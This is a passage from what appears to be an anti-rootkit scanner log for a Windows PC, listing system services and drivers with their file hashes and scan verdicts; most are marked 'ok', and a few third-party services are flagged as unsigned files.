23:13:17.0261 3596 [ 509809566E49F4411055864EA8D437CD ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
23:13:17.0269 3596 MSKSSRV - ok
23:13:17.0284 3596 [ 63145201D6458E4958E572E7D6FC2604 ] MsLldp C:\WINDOWS\system32\DRIVERS\mslldp.sys
23:13:17.0294 3596 MsLldp - ok
23:13:17.0305 3596 [ 80FF037D6184FFACB2740A50C7949D20 ] MSMQ C:\WINDOWS\system32\mqsvc.exe
23:13:17.0314 3596 MSMQ - ok
23:13:17.0326 3596 [ 99D526E803DB6D7FF290FD98B6204641 ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
23:13:17.0335 3596 MSPCLOCK - ok
23:13:17.0353 3596 [ 06FA77C3E2A491ADCD704C5E73006269 ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
23:13:17.0361 3596 MSPQM - ok
23:13:17.0443 3596 [ E134EC4DE11CF78CB01432D180710D84 ] MsRPC C:\WINDOWS\system32\drivers\MsRPC.sys
23:13:17.0473 3596 MsRPC - ok
23:13:17.0490 3596 [ B5AECF12F09DEE97C9FCAA5BA016CE1E ] mssmbios C:\WINDOWS\System32\drivers\mssmbios.sys
23:13:17.0499 3596 mssmbios - ok
23:13:17.0510 3596 [ 72D66A05E0F99F2528F6C6204FD22AA1 ] MSTEE C:\WINDOWS\system32\drivers\MSTEE.sys
23:13:17.0519 3596 MSTEE - ok
23:13:17.0536 3596 [ 8AAAE399FC255FA105D4158CBA289001 ] MTConfig C:\WINDOWS\System32\drivers\MTConfig.sys
23:13:17.0544 3596 MTConfig - ok
23:13:17.0557 3596 [ 3BCB702F3E6CC622DCAFCAA45D7CDE0A ] Mup C:\WINDOWS\system32\Drivers\mup.sys
23:13:17.0567 3596 Mup - ok
23:13:17.0582 3596 [ 3A1E095277BBD406CEA8EA6B76950664 ] mvumis C:\WINDOWS\system32\drivers\mvumis.sys
23:13:17.0591 3596 mvumis - ok
23:13:17.0685 3596 [ 4B18840511D720BA118D3017E8165875 ] napagent C:\WINDOWS\system32\qagentRT.dll
23:13:17.0713 3596 napagent - ok
23:13:17.0737 3596 [ 43D7388A90A4C6EA346A4D6FF0377479 ] NativeWifiP C:\WINDOWS\system32\DRIVERS\nwifi.sys
23:13:17.0751 3596 NativeWifiP - ok
23:13:17.0842 3596 [ E0E4A1F81A7D69C595A8A9DDAD084C19 ] NAUpdate C:\Program Files (x86)\Nero\Update\NASvc.exe
23:13:17.0854 3596 NAUpdate - ok
23:13:17.0901 3596 [ 6A0C3996DA7DAE6D6939676D786EEEC4 ] NcaSvc C:\WINDOWS\System32\ncasvc.dll
23:13:17.0912 3596 NcaSvc - ok
23:13:17.0926 3596 [ C982FE4CC91DECE2259F494FCEB4030F ] NcdAutoSetup C:\WINDOWS\System32\NcdAutoSetup.dll
23:13:17.0936 3596 NcdAutoSetup - ok
23:13:17.0973 3596 [ 0F89AE618DBA5D8AB7A2DFCC375F4159 ] NDIS C:\WINDOWS\system32\drivers\ndis.sys
23:13:17.0999 3596 NDIS - ok
23:13:18.0022 3596 [ 39C8A1D9D46F5E83A016BCAB72455284 ] NdisCap C:\WINDOWS\system32\DRIVERS\ndiscap.sys
23:13:18.0033 3596 NdisCap - ok
23:13:18.0066 3596 [ 762941932B7E4C588E48A577BA9D6440 ] NdisImPlatform C:\WINDOWS\system32\DRIVERS\NdisImPlatform.sys
23:13:18.0088 3596 NdisImPlatform - ok
23:13:18.0123 3596 [ 7A6F8A6D0E01432EBA294EF29CDD0FA7 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
23:13:18.0138 3596 NdisTapi - ok
23:13:18.0156 3596 [ 79AB68BB3FFF974AD4F41FA559F4EC67 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
23:13:18.0166 3596 Ndisuio - ok
23:13:18.0184 3596 [ 62C7DBF4F9301F76CF87D4B9D8F57BF8 ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
23:13:18.0197 3596 NdisWan - ok
23:13:18.0202 3596 [ 62C7DBF4F9301F76CF87D4B9D8F57BF8 ] NDISWANLEGACY C:\WINDOWS\system32\DRIVERS\ndiswan.sys
23:13:18.0214 3596 NDISWANLEGACY - ok
23:13:18.0229 3596 [ CE6EBC0AD38CC6482D8FBB744FF15CE2 ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
23:13:18.0238 3596 NDProxy - ok
23:13:18.0252 3596 [ D3F60A4345FCA9C1BE68AD7D0D6DE770 ] Ndu C:\WINDOWS\system32\drivers\Ndu.sys
23:13:18.0263 3596 Ndu - ok
23:13:18.0276 3596 [ 7C203A76394F9AE68F69EEE5F9612C4A ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
23:13:18.0287 3596 NetBIOS - ok
23:13:18.0340 3596 [ 7CEC25C682D319D484630B3952C31A11 ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
23:13:18.0374 3596 NetBT - ok
23:13:18.0387 3596 [ F702AB6181513303AB0FC8D59E52708B ] Netlogon C:\WINDOWS\system32\lsass.exe
23:13:18.0397 3596 Netlogon - ok
23:13:18.0434 3596 [ 89519D29CBEC2121CA65CC29C4D345E0 ] Netman C:\WINDOWS\System32\netman.dll
23:13:18.0448 3596 Netman - ok
23:13:18.0512 3596 [ 5243CFC2E7161C91C2B355240035B9E4 ] NetMsmqActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:13:18.0522 3596 NetMsmqActivator - ok
23:13:18.0527 3596 [ 5243CFC2E7161C91C2B355240035B9E4 ] NetPipeActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:13:18.0537 3596 NetPipeActivator - ok
23:13:18.0577 3596 [ C166E3CD90AB0781ECDF10EC765B083A ] netprofm C:\WINDOWS\System32\netprofmsvc.dll
23:13:18.0593 3596 netprofm - ok
23:13:18.0606 3596 [ 5243CFC2E7161C91C2B355240035B9E4 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:13:18.0615 3596 NetTcpActivator - ok
23:13:18.0630 3596 [ 5243CFC2E7161C91C2B355240035B9E4 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:13:18.0639 3596 NetTcpPortSharing - ok
23:13:18.0733 3596 [ 82FFC84EC3AFC2F2D38DB880F50157C0 ] Netzmanager Service C:\Program Files\Netzmanager\NMInfraIS2\Netzmanager_Service.exe
23:13:18.0761 3596 Netzmanager Service ( UnsignedFile.Multi.Generic ) - warning
23:13:18.0761 3596 Netzmanager Service - detected UnsignedFile.Multi.Generic (1)
23:13:18.0783 3596 [ 12DD2800E4EEA37DC9AE256AD62423B4 ] nfrd960 C:\WINDOWS\system32\drivers\nfrd960.sys
23:13:18.0804 3596 nfrd960 - ok
23:13:18.0889 3596 [ 80ABCD4C2DE9FD832477303AE0CA3BE5 ] NlaSvc C:\WINDOWS\System32\nlasvc.dll
23:13:18.0919 3596 NlaSvc - ok
23:13:18.0931 3596 [ 17E19A742FB30C002F8B43575451DBE1 ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
23:13:18.0941 3596 Npfs - ok
23:13:18.0956 3596 [ 8ED299C30792544264E558BEA79F0947 ] npsvctrig C:\WINDOWS\System32\drivers\npsvctrig.sys
23:13:18.0969 3596 npsvctrig - ok
23:13:19.0002 3596 [ 832B5FDF0B5577713FD7F2465FCD0ACE ] nsi C:\WINDOWS\system32\nsisvc.dll
23:13:19.0019 3596 nsi - ok
23:13:19.0036 3596 [ 689B3B1E95C70ABF7AFF29F9406EF1E0 ] nsiproxy C:\WINDOWS\system32\drivers\nsiproxy.sys
23:13:19.0045 3596 nsiproxy - ok
23:13:19.0085 3596 [ 11D7A4A4A1DA60F394F53B413DCDF0DE ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
23:13:19.0123 3596 Ntfs - ok
23:13:19.0141 3596 [ 4163ADE07DB51843AE31F65B94F5398D ] Null C:\WINDOWS\system32\drivers\Null.sys
23:13:19.0150 3596 Null - ok
23:13:19.0245 3596 [ D6D34118263412D3AAA8348A9572B7F2 ] nvraid C:\WINDOWS\system32\drivers\nvraid.sys
23:13:19.0256 3596 nvraid - ok
23:13:19.0300 3596 [ 27AFC428D1D32ABD04A86763A4EDDEA9 ] nvstor C:\WINDOWS\system32\drivers\nvstor.sys
23:13:19.0311 3596 nvstor - ok
23:13:19.0343 3596 [ 051CFB5107BAAE510419BDC41F8C4036 ] nv_agp C:\WINDOWS\system32\drivers\nv_agp.sys
23:13:19.0353 3596 nv_agp - ok
23:13:19.0424 3596 [ 7A56CF3E3F12E8AF599963B16F50FB6A ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
23:13:19.0431 3596 ose - ok
23:13:19.0507 3596 [ 4965B005492CBA7719E82B71E3245495 ] ose64 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
23:13:19.0516 3596 ose64 - ok
23:13:19.0630 3596 [ 61BFFB5F57AD12F83AB64B7181829B34 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
23:13:19.0707 3596 osppsvc - ok
23:13:19.0802 3596 [ AB76700D764A342D7475FB8F47CAB18C ] p2pimsvc C:\WINDOWS\system32\pnrpsvc.dll
23:13:19.0824 3596 p2pimsvc - ok
23:13:19.0838 3596 [ 4319FD931DCD796435ECB5DB4A04FBA5 ] p2psvc C:\WINDOWS\system32\p2psvc.dll
23:13:19.0853 3596 p2psvc - ok
23:13:19.0867 3596 [ 4563DAF8C6A740AD7F501E219BD10766 ] Parport C:\WINDOWS\System32\drivers\parport.sys
23:13:19.0877 3596 Parport - ok
23:13:19.0906 3596 [ D6ACCF9F2EEEEA711C14EFD976E573F3 ] partmgr C:\WINDOWS\system32\drivers\partmgr.sys
23:13:19.0917 3596 partmgr - ok
23:13:19.0948 3596 [ 4811D9EC53649105A5A8BEA661B0F936 ] PcaSvc C:\WINDOWS\System32\pcasvc.dll
23:13:19.0973 3596 PcaSvc - ok
23:13:19.0985 3596 [ 4A003E8F718C1E6A2050CA98CD53E3E2 ] pci C:\WINDOWS\system32\drivers\pci.sys
23:13:19.0998 3596 pci - ok
23:13:20.0014 3596 [ F9908D274D458220F91E89B54D78D837 ] pciide C:\WINDOWS\system32\drivers\pciide.sys
23:13:20.0022 3596 pciide - ok
23:13:20.0043 3596 [ 84D19CB6102627932DCB5DFDF89FE269 ] pcmcia C:\WINDOWS\system32\drivers\pcmcia.sys
23:13:20.0056 3596 pcmcia - ok
23:13:20.0076 3596 [ CEBBAD5391C2644560C55628A40BFD27 ] pcw C:\WINDOWS\system32\drivers\pcw.sys
23:13:20.0085 3596 pcw - ok
23:13:20.0117 3596 [ EF9B4F3136B4C45F421ADE6871659FB6 ] pdc C:\WINDOWS\system32\drivers\pdc.sys
23:13:20.0126 3596 pdc - ok
23:13:20.0188 3596 [ 70DBB6A8B52B3830922F1C5789E1BEEB ] PEAUTH C:\WINDOWS\system32\drivers\peauth.sys
23:13:20.0216 3596 PEAUTH - ok
23:13:20.0284 3596 [ DF0D9BDCB600913F40FF125BF8CE1979 ] PeerDistSvc C:\WINDOWS\system32\peerdistsvc.dll
23:13:20.0332 3596 PeerDistSvc - ok
23:13:20.0406 3596 [ EB88FA19F0EA05DD04BE9C5FFEEFFE1A ] PerfHost C:\WINDOWS\SysWow64\perfhost.exe
23:13:20.0415 3596 PerfHost - ok
23:13:20.0447 3596 [ 6E84BFF58F7643499277F29DFA2F8C8D ] pla C:\WINDOWS\system32\pla.dll
23:13:20.0477 3596 pla - ok
23:13:20.0514 3596 [ 799BE46D45D486704CE0F37CA5385262 ] PlugPlay C:\WINDOWS\system32\umpnpmgr.dll
23:13:20.0525 3596 PlugPlay - ok
23:13:20.0534 3596 [ 8E2414E818C26C4A9C70CB2B8567F04F ] PNRPAutoReg C:\WINDOWS\system32\pnrpauto.dll
23:13:20.0543 3596 PNRPAutoReg - ok
23:13:20.0563 3596 [ AB76700D764A342D7475FB8F47CAB18C ] PNRPsvc C:\WINDOWS\system32\pnrpsvc.dll
23:13:20.0574 3596 PNRPsvc - ok
23:13:20.0605 3596 [ 0108C8E5176D590F242701EF5A62CC26 ] PolicyAgent C:\WINDOWS\System32\ipsecsvc.dll
23:13:20.0622 3596 PolicyAgent - ok
23:13:20.0669 3596 [ F1E067F56373F11EA4B785CAE823740A ] Power C:\WINDOWS\system32\umpo.dll
23:13:20.0696 3596 Power - ok
23:13:20.0733 3596 [ 362D47E5B4D67270DE4B8606036F4ADD ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
23:13:20.0746 3596 PptpMiniport - ok
23:13:20.0868 3596 [ C2D3B3D0060619D5E03E696BD56FF59F ] PrintNotify C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
23:13:20.0920 3596 PrintNotify - ok
23:13:20.0958 3596 [ DD979EB6A7212F60E4AFBE96EDC7AE6D ] Processor C:\WINDOWS\System32\drivers\processr.sys
23:13:20.0972 3596 Processor - ok
23:13:20.0985 3596 [ 429E8502AD2227CF88F8840FC5BD590D ] ProfSvc C:\WINDOWS\system32\profsvc.dll
23:13:20.0998 3596 ProfSvc - ok
23:13:21.0015 3596 [ EB8034147D4820CD31BFCB11A2A652DF ] Psched C:\WINDOWS\system32\DRIVERS\pacer.sys
23:13:21.0028 3596 Psched - ok
23:13:21.0052 3596 [ 3DF18A193C758BE8E610B01331C237FB ] pwdrvio C:\WINDOWS\system32\pwdrvio.sys
23:13:21.0060 3596 pwdrvio - ok
23:13:21.0084 3596 [ 1EBD98FB3B567C552C9C85AB73729AEC ] pwdspio C:\WINDOWS\system32\pwdspio.sys
23:13:21.0091 3596 pwdspio - ok
23:13:21.0121 3596 [ 0AFBF333B6F87A2F598EAB379AF100B8 ] QWAVE C:\WINDOWS\system32\qwave.dll
23:13:21.0135 3596 QWAVE - ok
23:13:21.0169 3596 [ 13D47BB0CCA2FC51BD15F8E85C6A078E ] QWAVEdrv C:\WINDOWS\system32\drivers\qwavedrv.sys
23:13:21.0180 3596 QWAVEdrv - ok
23:13:21.0213 3596 [ 873C60F8178100557740A832FCE10B5F ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
23:13:21.0224 3596 RasAcd - ok
23:13:21.0257 3596 [ 69B93F623B130976243ECA3D84CC99CA ] RasAgileVpn C:\WINDOWS\system32\DRIVERS\AgileVpn.sys
23:13:21.0270 3596 RasAgileVpn - ok
23:13:21.0284 3596 [ 005F6E54C4A2DA4EBF68FB0392CE8BB0 ] RasAuto C:\WINDOWS\System32\rasauto.dll
23:13:21.0296 3596 RasAuto - ok
23:13:21.0311 3596 [ A14D625C5AEE5FFE0F47D1A1D419FAAE ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
23:13:21.0322 3596 Rasl2tp - ok
23:13:21.0357 3596 [ C923C785A2DE0B396AD6D13ACAFF2DE9 ] RasMan C:\WINDOWS\System32\rasmans.dll
23:13:21.0373 3596 RasMan - ok
23:13:21.0387 3596 [ 00695B9C2DB6111064499C529E90C042 ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
23:13:21.0399 3596 RasPppoe - ok
23:13:21.0428 3596 [ A7F24D8CD1956B0A1FDCB86CC5114DE4 ] RasSstp C:\WINDOWS\system32\DRIVERS\rassstp.sys
23:13:21.0440 3596 RasSstp - ok
23:13:21.0456 3596 [ B72C33DBD5326B3864CF2091AF8B906B ] rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
23:13:21.0470 3596 rdbss - ok
23:13:21.0488 3596 [ CA7DF5EC95D8DE0DD24BE7FF97369F68 ] rdpbus C:\WINDOWS\System32\drivers\rdpbus.sys
23:13:21.0497 3596 rdpbus - ok
23:13:21.0515 3596 [ B2A3AD74FF2E2FFA73AF2567108231B3 ] RDPDR C:\WINDOWS\system32\drivers\rdpdr.sys
23:13:21.0534 3596 RDPDR - ok
23:13:21.0564 3596 [ 57F4787E4602A3FCA719C0A33137C6DA ] RdpVideoMiniport C:\WINDOWS\system32\drivers\rdpvideominiport.sys
23:13:21.0594 3596 RdpVideoMiniport - ok
23:13:21.0613 3596 [ B3CB0721E81E30419CE7D837EF4EA151 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
23:13:21.0624 3596 RDPWD - ok
23:13:21.0645 3596 [ 62C1F8A0685FE07E998AA296C4F697C4 ] rdyboost C:\WINDOWS\system32\drivers\rdyboost.sys
23:13:21.0657 3596 rdyboost - ok
23:13:21.0697 3596 [ 3663CCF243EE0C04E9F6F91ED1737273 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
23:13:21.0711 3596 RemoteAccess - ok
23:13:21.0728 3596 [ E80DD61E52EDFFF9DA1ED7260A68855B ] RemoteRegistry C:\WINDOWS\system32\regsvc.dll
23:13:21.0745 3596 RemoteRegistry - ok
23:13:21.0774 3596 [ 73F2E030B5C24E4E41401B5F0D59E6FD ] RpcEptMapper C:\WINDOWS\System32\RpcEpMap.dll
23:13:21.0799 3596 RpcEptMapper - ok
23:13:21.0831 3596 [ 10B21284B3D964AB3DC45490E57D422E ] RpcLocator C:\WINDOWS\system32\locator.exe
23:13:21.0841 3596 RpcLocator - ok
23:13:21.0867 3596 [ 1EC6E533C954BDDF2A37E7851A7E58FD ] RpcSs C:\WINDOWS\system32\rpcss.dll
23:13:21.0883 3596 RpcSs - ok
23:13:21.0897 3596 [ E04E770DD198B9399640717145E79EBF ] rspndr C:\WINDOWS\system32\DRIVERS\rspndr.sys
23:13:21.0909 3596 rspndr - ok
23:13:21.0944 3596 [ 15923AA360F7675D3D43C9669316A0BA ] RTL8168 C:\WINDOWS\system32\DRIVERS\Rt630x64.sys
23:13:21.0961 3596 RTL8168 - ok
23:13:21.0994 3596 [ 752EC7DCD2F96871A3857EEE6AFE965A ] s3cap C:\WINDOWS\System32\drivers\vms3cap.sys
23:13:22.0002 3596 s3cap - ok
23:13:22.0037 3596 [ F702AB6181513303AB0FC8D59E52708B ] SamSs C:\WINDOWS\system32\lsass.exe
23:13:22.0047 3596 SamSs - ok
23:13:22.0067 3596 [ 9C7B28CE0D136DB226E24DB3BC817F92 ] sbp2port C:\WINDOWS\system32\drivers\sbp2port.sys
23:13:22.0078 3596 sbp2port - ok
23:13:22.0099 3596 [ 14316954FCE79C9DE5A0AFF9D42C83AA ] SCardSvr C:\WINDOWS\System32\SCardSvr.dll
23:13:22.0113 3596 SCardSvr - ok
23:13:22.0125 3596 [ 5D7733A12756B267FCA021672B26BC9E ] scfilter C:\WINDOWS\system32\DRIVERS\scfilter.sys
23:13:22.0136 3596 scfilter - ok
23:13:22.0180 3596 [ EDCDF4DB82EF825B94B190D544C8C58B ] Schedule C:\WINDOWS\system32\schedsvc.dll
23:13:22.0207 3596 Schedule - ok
23:13:22.0243 3596 [ BAF8F0F55BC300E5F882E521F054E345 ] SCPolicySvc C:\WINDOWS\System32\certprop.dll
23:13:22.0254 3596 SCPolicySvc - ok
23:13:22.0310 3596 [ 12F06525912BBEF67837DE47D87C60A9 ] sdbus C:\WINDOWS\System32\drivers\sdbus.sys
23:13:22.0335 3596 sdbus - ok
23:13:22.0346 3596 [ 92968277ED491E4B3DDA361E3952361E ] SDRSVC C:\WINDOWS\System32\SDRSVC.dll
23:13:22.0369 3596 SDRSVC - ok
23:13:22.0399 3596 [ BB107AA9980B0DA4E19A3A90C3BD4460 ] sdstor C:\WINDOWS\System32\drivers\sdstor.sys
23:13:22.0408 3596 sdstor - ok
23:13:22.0423 3596 [ 3EA8A16169C26AFBEB544E0E48421186 ] secdrv C:\WINDOWS\system32\drivers\secdrv.sys
23:13:22.0431 3596 secdrv - ok
23:13:22.0444 3596 [ CD282626738B6BC92B6E7CD0AAE95B63 ] seclogon C:\WINDOWS\system32\seclogon.dll
23:13:22.0456 3596 seclogon - ok
23:13:22.0472 3596 [ 9C51620998F0763039DFA6BF68E475ED ] SENS C:\WINDOWS\System32\sens.dll
23:13:22.0494 3596 SENS - ok
23:13:22.0504 3596 [ 0D50B4B860DAB65241628D04CD33ACAE ] SensrSvc C:\WINDOWS\system32\sensrsvc.dll
23:13:22.0527 3596 SensrSvc - ok
23:13:22.0543 3596 [ 87C46B239A7EEF30FDFDD5E9BD46130C ] SerCx C:\WINDOWS\system32\drivers\SerCx.sys
23:13:22.0553 3596 SerCx - ok
23:13:22.0573 3596 [ 7A1F9347C85FD55E39B8A76B3A25C5AD ] Serenum C:\WINDOWS\System32\drivers\serenum.sys
23:13:22.0581 3596 Serenum - ok
23:13:22.0586 3596 [ F640A0A218BBF857F1D04A15D7D939F6 ] Serial C:\WINDOWS\System32\drivers\serial.sys
23:13:22.0596 3596 Serial - ok
23:13:22.0611 3596 [ F1A5F56B2620B862CC28FF96A0A6DAAB ] sermouse C:\WINDOWS\System32\drivers\sermouse.sys
23:13:22.0620 3596 sermouse - ok
23:13:22.0645 3596 [ CB60A60340788C8D6DE2A269D28086AB ] SessionEnv C:\WINDOWS\system32\sessenv.dll
23:13:22.0658 3596 SessionEnv - ok
23:13:22.0673 3596 [ 7EE65419B29302C795714FF8073969A1 ] sfloppy C:\WINDOWS\System32\drivers\sfloppy.sys
23:13:22.0682 3596 sfloppy - ok
23:13:22.0726 3596 [ 090AE16F79C8EAD04E6031F863DA85F3 ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
23:13:22.0744 3596 SharedAccess - ok
23:13:22.0816 3596 [ A77F3ABE13FCC698511E5DEC7ACEBD5F ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
23:13:22.0834 3596 ShellHWDetection - ok
23:13:22.0851 3596 [ 2560721D6F16D5B611C36A3A9D28C1B2 ] SiSRaid2 C:\WINDOWS\system32\drivers\SiSRaid2.sys
23:13:22.0860 3596 SiSRaid2 - ok
23:13:22.0870 3596 [ 3AA8FDE1DBF65BB8B88B053529554A0D ] SiSRaid4 C:\WINDOWS\system32\drivers\sisraid4.sys
23:13:22.0881 3596 SiSRaid4 - ok
23:13:22.0992 3596 [ 8C4F0DCC6A5100D48F9B2F950CDD220F ] SkypeUpdate C:\Program Files (x86)\Skype\Updater\Updater.exe
23:13:22.0999 3596 SkypeUpdate - ok
23:13:23.0020 3596 [ E660156A4588A84305CB772FD2C0DB21 ] SNMPTRAP C:\WINDOWS\System32\snmptrap.exe
23:13:23.0032 3596 SNMPTRAP - ok
23:13:23.0083 3596 [ FFC5F7ED77AA59AA0A6B70F3D7A22A93 ] Sound Blaster X-Fi MB Licensing Service C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\XMBLicensing.exe
23:13:23.0086 3596 Sound Blaster X-Fi MB Licensing Service ( UnsignedFile.Multi.Generic ) - warning
23:13:23.0086 3596 Sound Blaster X-Fi MB Licensing Service - detected UnsignedFile.Multi.Generic (1)
23:13:23.0120 3596 [ 465F3C355CE5ED2779B8F460F14C5A78 ] spaceport C:\WINDOWS\system32\drivers\spaceport.sys
23:13:23.0134 3596 spaceport - ok
23:13:23.0145 3596 [ 3D8679C8DF52EB26EB7583A4E0A29202 ] SpbCx C:\WINDOWS\system32\drivers\SpbCx.sys
23:13:23.0154 3596 SpbCx - ok
23:13:23.0194 3596 [ 3F215BF2D4D8D6756298B25B579772C2 ] Spooler C:\WINDOWS\System32\spoolsv.exe
23:13:23.0211 3596 Spooler - ok
23:13:23.0508 3596 [ EC84D961501054F87A6878EC5D53388F ] sppsvc C:\WINDOWS\system32\sppsvc.exe
23:13:23.0580 3596 sppsvc - ok
23:13:23.0614 3596 [ 0F1FCD575A03ABDE13FCA9D0ADE4DDA6 ] srv C:\WINDOWS\system32\DRIVERS\srv.sys
23:13:23.0628 3596 srv - ok
23:13:23.0671 3596 [ C2106BB710AA34A046126AED7BCA6964 ] srv2 C:\WINDOWS\system32\DRIVERS\srv2.sys
23:13:23.0694 3596 srv2 - ok
23:13:23.0725 3596 [ 9400C71F5A1A380B494B6922F007D485 ] srvnet C:\WINDOWS\system32\DRIVERS\srvnet.sys
23:13:23.0743 3596 srvnet - ok
23:13:23.0830 3596 [ 7A20882D76D4A78240A5AC9F2C2EBA21 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
23:13:23.0850 3596 SSDPSRV - ok
23:13:23.0883 3596 [ D233B16999A8E626F6004BD7814C57EC ] SstpSvc C:\WINDOWS\system32\sstpsvc.dll
23:13:23.0906 3596 SstpSvc - ok
23:13:23.0930 3596 [ C692C94FE55CAD0633440236022C27B3 ] ssudmdm C:\WINDOWS\system32\DRIVERS\ssudmdm.sys
23:13:23.0939 3596 ssudmdm - ok
23:13:23.0959 3596 [ 4E85355B94CFCB67C135F6521A4895A7 ] stexstor C:\WINDOWS\system32\drivers\stexstor.sys
23:13:23.0968 3596 stexstor - ok
23:13:24.0015 3596 [ BAC8A721736AECC55A4F71523AEAB65F ] stisvc C:\WINDOWS\System32\wiaservc.dll
23:13:24.0044 3596 stisvc - ok
23:13:24.0072 3596 [ C588BBD37B432CE3204E5765B459E6B2 ] storahci C:\WINDOWS\system32\drivers\storahci.sys
23:13:24.0083 3596 storahci - ok
23:13:24.0103 3596 [ F74DBC95A57B1EE866D3732EB5F79BE2 ] storflt C:\WINDOWS\system32\DRIVERS\vmstorfl.sys
23:13:24.0112 3596 storflt - ok
23:13:24.0125 3596 [ 5337E138B49ED1F44CCBA4073BC35C20 ] StorSvc C:\WINDOWS\system32\storsvc.dll
23:13:24.0141 3596 StorSvc - ok
23:13:24.0153 3596 [ 543CD3CC0E05B8D8815E0D4F040B6F59 ] storvsc C:\WINDOWS\system32\drivers\storvsc.sys
23:13:24.0162 3596 storvsc - ok
23:13:24.0180 3596 [ 1A36AC469140F87CDE62D7F8524E270C ] storvsp C:\WINDOWS\System32\drivers\storvsp.sys
23:13:24.0208 3596 storvsp - ok
23:13:24.0224 3596 [ 8BC1C1ED6EF9C985A3FAA6A72F41679A ] svsvc C:\WINDOWS\system32\svsvc.dll
23:13:24.0247 3596 svsvc - ok
23:13:24.0256 3596 [ 4AFD66AAE74FFB5986BC240744DC5FC9 ] swenum C:\WINDOWS\System32\drivers\swenum.sys
23:13:24.0266 3596 swenum - ok
23:13:24.0337 3596 [ F577910A133A592234EBAAD3F3AFA258 ] SwitchBoard C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
23:13:24.0348 3596 SwitchBoard ( UnsignedFile.Multi.Generic ) - warning
23:13:24.0348 3596 SwitchBoard - detected UnsignedFile.Multi.Generic (1)
23:13:24.0368 3596 [ 502F9488540051F3E6C39889ECFA76BB ] swprv C:\WINDOWS\System32\swprv.dll
23:13:24.0390 3596 swprv - ok
23:13:24.0433 3596 [ C3A39C4079305480972D29C44B868C78 ] Synth3dVsc C:\WINDOWS\system32\drivers\synth3dvsc.sys
23:13:24.0454 3596 Synth3dVsc - ok
23:13:24.0489 3596 [ DC21E1F06343773D7E24362DCEF7944B ] SysMain C:\WINDOWS\system32\sysmain.dll
23:13:24.0517 3596 SysMain - ok
23:13:24.0551 3596 [ E219BF7BCCFE4881B0C053C7E0B47ECC ] SystemEventsBroker C:\WINDOWS\System32\SystemEventsBrokerServer.dll
23:13:24.0567 3596 SystemEventsBroker - ok
23:13:24.0599 3596 [ A6C06C45C44AD06C70AF8899AEC15BDC ] TabletInputService C:\WINDOWS\System32\TabSvc.dll
23:13:24.0622 3596 TabletInputService - ok
23:13:24.0715 3596 [ 88B7721AB551C4325036B25A34A2BF7B ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
23:13:24.0738 3596 TapiSrv - ok
23:13:24.0825 3596 [ D192288CE5FB395F0BBAFDD1A8B5285D ] Tcpip C:\WINDOWS\system32\drivers\tcpip.sys
23:13:24.0873 3596 Tcpip - ok
23:13:24.0898 3596 [ D192288CE5FB395F0BBAFDD1A8B5285D ] TCPIP6 C:\WINDOWS\system32\DRIVERS\tcpip.sys
23:13:24.0934 3596 TCPIP6 - ok
23:13:24.0952 3596 [ 8F2A13A5DF99D72FDDE87F502A66F989 ] tcpipreg C:\WINDOWS\system32\drivers\tcpipreg.sys
23:13:24.0963 3596 tcpipreg - ok
23:13:25.0000 3596 [ 73DC722CE5DF26D7638CE2446F2655C7 ] tdx C:\WINDOWS\system32\DRIVERS\tdx.sys
23:13:25.0010 3596 tdx - ok
23:13:25.0035 3596 [ F5520DBB47C60EE83024B38720ABDA24 ] teamviewervpn C:\WINDOWS\system32\DRIVERS\teamviewervpn.sys
23:13:25.0041 3596 teamviewervpn - ok
23:13:25.0149 3596 [ 4283D7125BA4BD0CB50BB0F78B54257A ] TelekomNM6 C:\Program Files\Netzmanager\NMInfraIS2\Driver\TelekomNM6.sys
23:13:25.0155 3596 TelekomNM6 - ok
23:13:25.0168 3596 [ F7C8AB5D8AFFAA318D6A21093D139BF4 ] terminpt C:\WINDOWS\System32\drivers\terminpt.sys
23:13:25.0176 3596 terminpt - ok
23:13:25.0213 3596 [ 541EE228D0DEF392F7B2DFD885DD021B ] TermService C:\WINDOWS\System32\termsrv.dll
23:13:25.0228 3596 TermService - ok
23:13:25.0261 3596 [ 519A6F672FFF56B7D8EE8C730CEC8ECD ] Themes C:\WINDOWS\system32\themeservice.dll
23:13:25.0284 3596 Themes - ok
23:13:25.0313 3596 [ EEE908BE7143FCA48CF0CB87214E2AB8 ] THREADORDER C:\WINDOWS\system32\mmcss.dll
23:13:25.0331 3596 THREADORDER - ok
